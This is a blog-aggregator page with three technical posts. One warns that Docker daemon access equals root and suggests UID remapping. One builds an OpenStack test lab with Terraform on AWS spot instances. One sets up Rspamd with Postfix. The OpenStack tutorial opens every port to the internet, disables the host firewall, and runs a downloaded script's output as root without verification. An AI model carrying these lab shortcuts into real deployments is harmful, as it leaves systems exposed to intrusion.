However, they fail to mention that giving a user control of your Docker daemon is basically the same as giving them root access. Given that many companies are doing auto-deployments, and have probably given docker daemon access to a deployment user, your build server is now effectively also root on all your build slaves, dev, uat and perhaps even production systems.

Luckily, since Docker’s approach to secure by default through apparmor, seccomp, and dropping capabilities

3 seconds to get root on my host with a default Docker install doesn't look like "secure by default" to me. None of these options were enabled by default when I CURL-installed (!!&(@#!) Docker on my system, nor was I warned that I'd need to secure things manually.

How to fix this

There's a workaround available. It's hidden deep in the documentation and took me a while to find. Eventually some StackExchange discussion pointed me to a concept known as UID remapping (subuids). This uses Linux user namespaces to map the user IDs of users in a container to a different range on the host. For example, if you remap UIDs to a range starting at 20000, then the root user (uid 0) in the container becomes uid 20000 on the host, uid 1 becomes uid 20001, and so on.

You can read about how to manually (because docker is secure by default, remember) configure that on the Isolate containers with a user namespace documentation page. 
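
As a rough sketch (assuming a systemd-based host and the option names from that documentation page; double-check them against your Docker version), enabling the remapping comes down to one daemon option plus a restart:

$ cat /etc/docker/daemon.json
{
    "userns-remap": "default"
}
$ sudo systemctl restart docker

With "default", Docker creates a dockremap user and allocates subordinate UID/GID ranges for it in /etc/subuid and /etc/subgid, so uid 0 inside a container maps to an unprivileged ID on the host. Volumes written by earlier, un-remapped containers may need their ownership fixed afterwards.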

by admin at September 30, 2017 12:39 PM

Joe Topjian

Building OpenStack Environments

Introduction

I work on a number of OpenStack-based projects. In order to make sure they work correctly, I need to test them against an OpenStack environment. It's usually not a good idea to test on a production environment, since mistakes and bugs can cause damage to production.

So the next best option is to create an OpenStack environment strictly for testing purposes. This blog post will describe how to create such an environment.

Where to Run OpenStack

The first topic of consideration is where to run OpenStack.

VirtualBox

At a minimum, you can install VirtualBox on your workstation and create a virtual machine. This is quick, easy, and free. However, you're limited to the resources of your workstation. For example, if your laptop only has 4GB of memory and two cores, OpenStack is going to run slow.

AWS

Another option is to use AWS. While AWS offers a free tier, it's restricted (I think) to the t2.micro flavor. This flavor only supports 1 vCPU, which is usually worse than your laptop. Larger instances will cost anywhere from $0.25 to $5.00 (and up!) per hour to run. It can get expensive.

However, AWS offers "spot-instances". These are virtual machines that cost a fraction of normal virtual machines. This is possible because spot instances run on spare, unused capacity in Amazon's cloud. The catch is that your virtual machine could be deleted when a higher paying customer wants to use the space. You certainly don't want to do this for production (well, you can, and that's a fun exercise on its own), but for testing, it's perfect.

With Spot Instances, you can run an m3.xlarge flavor, which consists of 4 vCPUs and 16GB of memory, for $0.05 per hour. An afternoon of work will cost you $0.20. Well worth the cost of 4 vCPUs and 16GB of memory, in my opinion.

Spot Pricing is constantly changing. Make sure you check the current price before you begin working. And make sure you do not leave your virtual machine running indefinitely!
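
Besides the AWS console, the current price can also be checked from the command line. A minimal sketch, assuming the AWS CLI is installed and configured for the us-west-2 region used later in this post:

$ aws ec2 describe-spot-price-history \
    --region us-west-2 \
    --instance-types m3.xlarge \
    --product-descriptions "Linux/UNIX" \
    --start-time $(date -u +%Y-%m-%dT%H:%M:%S) \
    --query 'SpotPriceHistory[*].[AvailabilityZone,SpotPrice]' \
    --output table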

Other Spot Pricing Clouds

Both Google and Azure offer spot instances; however, I have not had time to try them, so I can't comment.

Your Own Cloud

The best resource is your own cloud. Maybe you already have a home lab set up or your place of $work has a cloud you can use. This way, you can have a large amount of resources available to use for free.

Provisioning a Virtual Machine

Once you have your location sorted out, you need to decide how to interact with the cloud to provision a virtual machine.

At a minimum, you can use the standard GUI or console that the cloud provides. This works, but it's a hassle to have to manually go through all settings each time you want to launch a new virtual machine. It's always best to test with a clean environment, so you will be creating and destroying virtual machines a lot. Manually setting up virtual machines will get tedious and is prone to human error. Therefore, it's better to use a tool to automate the process.

Terraform

Terraform is a tool that enables you to declaratively create infrastructure. Think of it like Puppet or Chef, but for virtual machines and virtual networks instead of files and packages.

I highly recommend Terraform for this, though I admit I am biased because I spend a lot of time contributing to the Terraform project.

Deploying to AWS

As a reference example, I'll show how to use Terraform to deploy to AWS. Before you begin, make sure you have a valid AWS account and you have gone through the Terraform intro.

There's some irony about using AWS to deploy OpenStack. However, some readers might not have access to an OpenStack cloud to deploy to. Please don't turn this into a political discussion.

On your workstation, open a terminal and make a directory:

$ pwd
/home/jtopjian
$ mkdir terraform-openstack-test
$ cd terraform-openstack-test

Next, generate an SSH key pair:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir key
$ cd key
$ ssh-keygen -t rsa -N '' -f id_rsa
$ cd ..

Next, create a main.tf file which will house our configuration:

$ pwd
/home/jtopjian/terraform-openstack-test
$ vi main.tf

Start by creating a key pair:

provider "aws" {
  region = "us-west-2"
}

resource "aws_key_pair" "openstack" {
  key_name   = "openstack-key"
  public_key = "${file("key/id_rsa.pub")}"
}

With that in place, run:

$ terraform init
$ terraform apply

Next, create a Security Group. This will allow traffic in and out of the virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

+ resource "aws_security_group" "openstack" {
+   name        = "openstack"
+   description = "Allow all inbound/outbound traffic"
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "tcp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "udp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "icmp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+ }

Note: Don't include the +. It's used to highlight what has been added to the configuration.

With that in place, run:

$ terraform plan
$ terraform apply

If you log in to your AWS console through a browser, you can see that the key pair and security group have been added to your account.
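
If you prefer the command line over the browser, the same check can be done with the AWS CLI (a sketch, assuming the CLI is configured for the same account and region):

$ aws ec2 describe-key-pairs --region us-west-2 --key-names openstack-key
$ aws ec2 describe-security-groups --region us-west-2 --filters Name=group-name,Values=openstack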

You can easily destroy and recreate these resources at-will:

$ terraform plan
$ terraform destroy
$ terraform plan
$ terraform apply
$ terraform show

Finally, create a virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

+ resource "aws_spot_instance_request" "openstack" {
+   ami = "ami-0c2aba6c"
+   spot_price = "0.0440"
+   instance_type = "m3.xlarge"
+   wait_for_fulfillment = true
+   spot_type = "one-time"
+   key_name = "${aws_key_pair.openstack.key_name}"
+
+   security_groups = ["default", "${aws_security_group.openstack.name}"]
+
+   root_block_device {
+     volume_size = 40
+     delete_on_termination = true
+   }
+
+   tags {
+     Name = "OpenStack Test Infra"
+   }
+ }
+
+ output "ip" {
+   value = "${aws_spot_instance_request.openstack.public_ip}"
+ }

Above, an aws_spot_instance_request resource was added. This will launch a Spot Instance using the parameters we specified.

It's important to note that the aws_spot_instance_request resource also takes the same parameters as the aws_instance resource.

The ami being used is the latest CentOS 7 AMI published in the us-west-2 region. You can see the list of AMIs here. Make sure you use the correct AMI for the region you're deploying to.

Notice how this resource is referencing the other resources you created (the key pair, and the security group). Additionally, notice how you're specifying a spot_price. This is helpful to limit the amount of money that will be spent on this instance. You can get an accurate price by going to the Spot Request page and clicking on "Pricing History". Again, make sure you are looking at the correct region.

An output was also added to the main.tf file. This will print out the public IP address of the AWS instance when Terraform completes.
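
If you need the address again later, it can be re-printed from the Terraform state at any time; a small sketch using the "ip" output defined above (the instance must already exist in the state for this to return anything):

$ terraform output ip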

Amazon limits the amount of spot instances you can launch at any given time. You might find that if you create, delete, and recreate a spot instance too quickly, Terraform will give you an error. This is Amazon telling you to wait. You can open a support ticket with Amazon/AWS and ask for a larger spot quota to be placed on your account. I asked for the ability to launch 5 spot instances at any given time in the us-west-1 and us-west-2 region. This took around two business days to complete.

With all of this in place, run Terraform:

$ terraform apply

When it has completed, you should see output similar to the following:

Outputs:

ip = 54.71.64.171

You should now be able to SSH to the instance:

$ ssh -i key/id_rsa centos@54.71.64.171

And there you have it! You now have access to a CentOS virtual machine to continue testing OpenStack with.

Installing OpenStack

There are numerous ways to install OpenStack. Given that the purpose of this setup is to create an easy-to-deploy OpenStack environment for testing, let's narrow our choices down to methods that can provide a simple all-in-one setup.

DevStack

DevStack provides an easy way of creating an all-in-one environment for testing. It's mainly used to test the latest OpenStack source code. Because of that, it can be buggy. I've found that even when using DevStack to deploy a stable version of OpenStack, there were times when DevStack failed to complete. Given that it takes approximately two hours for DevStack to install, having the installation fail has just wasted two hours of time.

Additionally, DevStack isn't suitable for a virtual machine that might reboot, since the services it starts don't come back cleanly after a restart. When testing an application that uses OpenStack, it's quite possible for the application to overload the virtual machine and lock it up.

So for these reasons, I won't use DevStack here. That's not to say that DevStack isn't a suitable tool – after all, it's used as the core of all OpenStack testing.

PackStack

PackStack is also able to easily install an all-in-one OpenStack environment. Rather than building OpenStack from source, it leverages RDO packages and Puppet.

PackStack is also beneficial because it will install the latest stable release of OpenStack. If you are developing an application that end-users will use, these users will most likely be using an OpenStack cloud based on a stable release.

Installing OpenStack with PackStack

The PackStack home page has all necessary instructions to get a simple environment up and running. Here are all of the steps compressed into a shell script:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

OpenStack Pike is available at the time of this writing; however, I have not had a chance to test and verify that the instructions work with it. Therefore, I'll be using Ocata.

Save the file as something like deploy.sh and then run it in your virtual machine:

$ sudo bash deploy.sh

Consider using a tool like tmux or screen after logging into your remote virtual machine. This will ensure the deploy.sh script continues to run, even if your connection to the virtual machine was terminated.
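
For example, with tmux (a minimal sketch; the session name and log file are arbitrary):

$ tmux new -s packstack
$ sudo bash deploy.sh 2>&1 | tee packstack.log

If the SSH connection drops, log back in and run tmux attach -t packstack to pick up where you left off.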

The process will take approximately 30 minutes to complete.

When it's finished, you'll now have a usable all-in-one environment:

$ sudo su
$ cd /root
$ source keystonerc_demo
$ openstack network list
$ openstack image list
$ openstack server create --flavor 1 --image cirros test

Testing with OpenStack

Now that OpenStack is up and running, you can begin testing with it.

Let's say you want to add a new feature to Gophercloud. First, you need to install Go:

$ yum install -y wget
$ wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
$ chmod +x /usr/local/bin/gimme
$ eval "$(/usr/local/bin/gimme 1.8)"
$ export GOPATH=$HOME/go
$ export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

To make those commands permanent, add the following to your .bashrc file:

if [[ -f /usr/local/bin/gimme ]]; then
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
fi

Next, install Gophercloud:

$ go get github.com/gophercloud/gophercloud
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go get -u ./...

In order to run Gophercloud acceptance tests, you need to have several environment variables set. These are described here.

It would be tedious to set each variable for each test or each time you log in to the virtual machine. Therefore, embed the variables into the /root/keystonerc_demo and /root/keystonerc_admin files:

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

Now try to run a test:

$ source ~/keystonerc_demo
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go test -v -tags "fixtures acceptance" -run "TestServersCreateDestroy" \
  github.com/gophercloud/gophercloud/acceptance/openstack/compute/v2

That go command is long and tedious. A shortcut would be more helpful. Add the following to ~/.bashrc:

gophercloudtest() {
  if [[ -n $1 ]] && [[ -n $2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "$1" github.com/gophercloud/gophercloud/acceptance/openstack/$2 | tee ~/gophercloud.log
    popd
  fi
}

You can now run tests by doing:

$ source ~/.bashrc
$ gophercloudtest TestServersCreateDestroy compute/v2

Automating the Process

There's been a lot of work done since first logging into the virtual machine and it would be a hassle to have to do it all over again. It would be better if the entire process was automated, from start to finish.

First, create a new directory on your workstation:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir files
$ cd files
$ vi deploy.sh

In the deploy.sh script, add the following contents:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

yum install -y wget
wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
chmod +x /usr/local/bin/gimme
eval "$(/usr/local/bin/gimme 1.8)"
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

go get github.com/gophercloud/gophercloud
pushd ~/go/src/github.com/gophercloud/gophercloud
go get -u ./...
popd

cat >> /root/.bashrc <<EOF
if [[ -f /usr/local/bin/gimme ]]; then
  eval "\$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=\$PATH:$GOROOT/bin:\$GOPATH/bin
fi

gophercloudtest() {
  if [[ -n \$1 ]] && [[ -n \$2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
    popd
  fi
}
EOF

Next, add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

  resource "aws_spot_instance_request" "openstack" {
    ami = "ami-0c2aba6c"
    spot_price = "0.0440"
    instance_type = "m3.xlarge"
    wait_for_fulfillment = true
    spot_type = "one-time"
    key_name = "${aws_key_pair.openstack.key_name}"

    security_groups = ["default", "${aws_security_group.openstack.name}"]

    root_block_device {
      volume_size = 40
      delete_on_termination = true
    }

    tags {
      Name = "OpenStack Test Infra"
    }
  }

+ resource "null_resource" "openstack" {
+  connection {
+    host        = "${aws_spot_instance_request.openstack.public_ip}"
+    user        = "centos"
+    private_key = "${file("key/id_rsa")}"
+  }
+
+  provisioner "file" {
+    source      = "files"
+    destination = "/home/centos/files"
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "sudo bash /home/centos/files/deploy.sh"
+    ]
+  }
+ }

  output "ip" {
    value = "${aws_spot_instance_request.openstack.public_ip}"
  }

The above has added a null_resource. null_resource is simply an empty Terraform resource. It's commonly used to store all provisioning steps. In this case, the above null_resource is doing the following:

  1. Configuring the connection to the virtual machine.
  2. Copying the files directory to the virtual machine.
  3. Remotely running the deploy.sh script.

Now when you run Terraform, once the Spot Instance has been created, Terraform will copy the files directory to it and then execute deploy.sh. Terraform will now take approximately 30-40 minutes to finish, but when it has finished, OpenStack will be up and running.
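
A nice side effect of keeping the provisioning steps in a null_resource is that you can re-run them against an existing instance (for example, after editing deploy.sh) without rebuilding anything else. A sketch, assuming the taint command in the Terraform versions current at the time of writing:

$ terraform taint null_resource.openstack
$ terraform apply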

Since a new resource type has been added (null_resource), you will need to run terraform init:

$ pwd
/home/jtopjian/terraform-openstack-test
$ terraform init

Then to run everything from start to finish, do:

$ terraform destroy
$ terraform apply

When Terraform is finished, you will have a fully functional OpenStack environment suitable for testing.
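
As a quick smoke test once Terraform reports success (a sketch reusing the SSH key from earlier and the keystonerc_demo file that PackStack writes on the instance):

$ ssh -i key/id_rsa centos@$(terraform output ip)
$ sudo su -
# source /root/keystonerc_demo
# openstack server list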

Conclusion

This post detailed how to create an all-in-one OpenStack environment that is suitable for testing applications. Additionally, all configuration was recorded both in Terraform and shell scripts so the environment can be created automatically.

Granted, if you aren't creating a Go-based application, you will need to install other dependencies, but it should be easy to figure out from the example detailed here.

While this setup is a great way to easily build a testing environment, there are still other improvements that can be made. For example, instead of running PackStack each time, an AMI image can be created which already has OpenStack installed. Additionally, multi-node environments can be created for more advanced testing. These methods will be detailed in future posts.

September 30, 2017 06:00 AM

September 27, 2017

Evaggelos Balaskas

Rspamd Fast, free and open-source spam filtering system

Fighting Spam

Fighting email spam in modern times, most of the time, looks like this:

1ab83c40625d102da1b3001438c0f03b.gif

Rspamd

Rspamd is a rapid spam filtering system. Written in C with Lua script engine extension seems to be really fast and a really good solution for SOHO environments.

In this blog post, I'll try to present a quickstart guide to working with rspamd on a CentOS 6.9 machine running postfix.

DISCLAIMER: This blog post is from a very technical point of view!

Installation

We are going to install rspamd via known rpm repositories:

Epel Repository

We need to install epel repository first:

# yum -y install http://fedora-mirror01.rbc.ru/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

Rspamd Repository

Now it is time to setup the rspamd repository:

# curl https://rspamd.com/rpm-stable/centos-6/rspamd.repo -o /etc/yum.repos.d/rspamd.repo

Install the gpg key

# rpm --import http://rspamd.com/rpm-stable/gpg.key

and verify the repository with # yum repolist

repo id     repo name
base        CentOS-6 - Base
epel        Extra Packages for Enterprise Linux 6 - x86_64
extras      CentOS-6 - Extras
rspamd      Rspamd stable repository
updates     CentOS-6 - Updates

Rpm

Now it is time to install rspamd to our linux box:

# yum -y install rspamd


# yum info rspamd

Name        : rspamd
Arch        : x86_64
Version     : 1.6.3
Release     : 1
Size        : 8.7 M
Repo        : installed
From repo   : rspamd
Summary     : Rapid spam filtering system
URL         : https://rspamd.com
License     : BSD2c
Description : Rspamd is a rapid, modular and lightweight spam filter. It is designed to work
            : with big amount of mail and can be easily extended with own filters written in
            : lua.

Init File

We need to correct the rspamd init file so that rspamd can find the correct configuration file:

# vim /etc/init.d/rspamd

# ebal, Wed, 06 Sep 2017 00:31:37 +0300
## RSPAMD_CONF_FILE="/etc/rspamd/rspamd.sysvinit.conf"
RSPAMD_CONF_FILE="/etc/rspamd/rspamd.conf"

or


# ln -s /etc/rspamd/rspamd.conf /etc/rspamd/rspamd.sysvinit.conf

Start Rspamd

We are now ready to start the rspamd daemon for the first time:

# /etc/init.d/rspamd restart

syntax OK
Stopping rspamd:                                           [FAILED]
Starting rspamd:                                           [  OK  ]

verify that it is running:

# ps -e fuwww | egrep -i rsp[a]md


root      1337  0.0  0.7 205564  7164 ?        Ss   20:19   0:00 rspamd: main process
_rspamd   1339  0.0  0.7 206004  8068 ?        S    20:19   0:00  _ rspamd: rspamd_proxy process
_rspamd   1340  0.2  1.2 209392 12584 ?        S    20:19   0:00  _ rspamd: controller process
_rspamd   1341  0.0  1.0 208436 11076 ?        S    20:19   0:00  _ rspamd: normal process   

perfect, now it is time to enable rspamd to run on boot:

# chkconfig rspamd on

# chkconfig --list | egrep rspamd
rspamd          0:off   1:off   2:on    3:on    4:on    5:on    6:off

Postfix

In a nutshell, postfix will pass an email through (filter it) via the milter protocol to another application before queuing it to one of postfix’s mail queues. Think of milter as a bridge that connects two different applications.

rspamd_milter_direct.png

Rspamd Proxy

In Rspamd 1.6, Rmilter is obsolete, but the rspamd proxy worker supports the milter protocol. That means we need to connect postfix to rspamd_proxy via the milter protocol.

Rspamd has a really nice documentation: https://rspamd.com/doc/index.html
On MTA integration you can find more info.

# netstat -ntlp | egrep -i rspamd

output:

tcp        0      0 0.0.0.0:11332               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 0.0.0.0:11333               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 127.0.0.1:11334             0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 :::11332                    :::*                        LISTEN      1451/rspamd
tcp        0      0 :::11333                    :::*                        LISTEN      1451/rspamd
tcp        0      0 ::1:11334                   :::*                        LISTEN      1451/rspamd  

# egrep -A1 proxy /etc/rspamd/rspamd.conf


worker "rspamd_proxy" {
    bind_socket = "*:11332";
    .include "$CONFDIR/worker-proxy.inc"
    .include(try=true; priority=1,duplicate=merge) "$LOCAL_CONFDIR/local.d/worker-proxy.inc"
    .include(try=true; priority=10) "$LOCAL_CONFDIR/override.d/worker-proxy.inc"
}

Milter

If you want to see all the possible milter configuration parameters in postfix:

# postconf | egrep -i milter

output:

milter_command_timeout = 30s
milter_connect_macros = j {daemon_name} v
milter_connect_timeout = 30s
milter_content_timeout = 300s
milter_data_macros = i
milter_default_action = tempfail
milter_end_of_data_macros = i
milter_end_of_header_macros = i
milter_helo_macros = {tls_version} {cipher} {cipher_bits} {cert_subject} {cert_issuer}
milter_macro_daemon_name = $myhostname
milter_macro_v = $mail_name $mail_version
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {mail_host} {mail_mailer}
milter_protocol = 6
milter_rcpt_macros = i {rcpt_addr} {rcpt_host} {rcpt_mailer}
milter_unknown_command_macros =
non_smtpd_milters =
smtpd_milters = 

We are mostly interested in the last two, but it is best to follow the rspamd documentation:

# vim /etc/postfix/main.cf

Adding the below configuration lines:

# ebal, Sat, 09 Sep 2017 18:56:02 +0300

## A list of Milter (mail filter) applications for new mail that does not arrive via the Postfix smtpd(8) server.
non_smtpd_milters = inet:127.0.0.1:11332

## A list of Milter (mail filter) applications for new mail that arrives via the Postfix smtpd(8) server.
smtpd_milters = inet:127.0.0.1:11332

## Send macros to mail filter applications
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {client_addr} {client_name} {mail_host} {mail_mailer}

## skip mail without checks if something goes wrong, like rspamd is down !
milter_default_action = accept

Reload postfix

# postfix reload

postfix/postfix-script: refreshing the Postfix mail system
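
A quick way to confirm that the new settings are active is postconf -n, which only prints parameters explicitly set in main.cf:

# postconf -n | egrep -i milter

milter_default_action = accept
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {client_addr} {client_name} {mail_host} {mail_mailer}
non_smtpd_milters = inet:127.0.0.1:11332
smtpd_milters = inet:127.0.0.1:11332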

Testing

netcat

From a client:

$ nc 192.168.122.96 25

220 centos69.localdomain ESMTP Postfix
EHLO centos69
250-centos69.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM: <root@example.org>
250 2.1.0 Ok
RCPT TO: <root@localhost>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
test
.
250 2.0.0 Ok: queued as 4233520144
^]

Logs

Looking through logs may be a difficult task for many; even so, it is a task that you have to do.

MailLog

# egrep 4233520144 /var/log/maillog


Sep  9 19:08:01 localhost postfix/smtpd[1960]: 4233520144: client=unknown[192.168.122.1]
Sep  9 19:08:05 localhost postfix/cleanup[1963]: 4233520144: message-id=<>
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: from=<root@example.org>, size=217, nrcpt=1 (queue active)
Sep  9 19:08:05 localhost postfix/local[1964]: 4233520144: to=<root@localhost.localdomain>, orig_to=<root@localhost>, relay=local, delay=12, delays=12/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: removed

Everything seems fine with postfix.

Rspamd Log

# egrep -i 4233520144 /var/log/rspamd/rspamd.log

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_message_parse: loaded message; id: <undef>; queue-id: <4233520144>; size: 6; checksum: <a6a8e3835061e53ed251c57ab4f22463>

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_task_write_log: id: <undef>, qid: <4233520144>, ip: 192.168.122.1, from: <root@example.org>, (default: F (add header): [9.40/15.00] [MISSING_MID(2.50){},MISSING_FROM(2.00){},MISSING_SUBJECT(2.00){},MISSING_TO(2.00){},MISSING_DATE(1.00){},MIME_GOOD(-0.10){text/plain;},ARC_NA(0.00){},FROM_NEQ_ENVFROM(0.00){;root@example.org;},RCVD_COUNT_ZERO(0.00){0;},RCVD_TLS_ALL(0.00){}]), len: 6, time: 87.992ms real, 4.723ms virtual, dns req: 0, digest: <a6a8e3835061e53ed251c57ab4f22463>, rcpts: <root@localhost>

It works !

Training

If you already have a spam or junk folder, it is really easy to train the Bayesian classifier with rspamc.

I use Maildir, so for my setup the initial training is something like this:

 # cd /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ 

# find . -type f -exec rspamc learn_spam {} \;

Auto-Training

I’ve read a lot of tutorials that suggest real-time training via dovecot plugins or something similar. I personally think that approach adds complexity; for small companies or a personal setup, I prefer using the cron daemon:


 @daily /bin/find /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ -type f -mtime -1 -exec rspamc learn_spam {} \;

That means: every day, find emails that landed in my spam folder within the last day and use them to train rspamd.
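
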